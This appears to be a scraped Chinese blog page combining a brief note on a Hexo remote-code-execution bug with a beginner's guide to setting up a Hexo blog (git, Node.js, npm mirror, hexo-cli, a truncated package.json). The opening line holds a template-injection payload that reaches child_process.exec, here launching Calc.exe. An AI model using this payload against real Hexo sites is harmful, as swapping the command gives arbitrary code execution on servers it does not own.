hexo的rce
{{joiner.constructor(“global.process.mainModule.require(‘child_process’).exec(‘Calc.exe’)”)() }}
很鸡肋的洞,不能直接带来啥大的危害。
https://gem-love.com/2023/07/25/hexo%E5%8D%9A%E5%AE%A2%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
我的新博客
backgroundhexo搭建安装git
https://git-scm.com/downloads
安装nodejs
https://nodejs.org/en/
换源
npm config set registry http://registry.npm.taobao.org/
安装(找一个文件夹存放博客的文件,右键-open git bash)
npm install hexo-cli -ghexo inithexo s
主题美化安装各种依赖环境,我这里就直接安所有的包了,直接替换掉package.json里的内容,然后在目录下npm install
{ "name": "hexo-site", "version": "0.0.0", "private": true, "scripts": { "build": "hexo generate", "clean&qu ...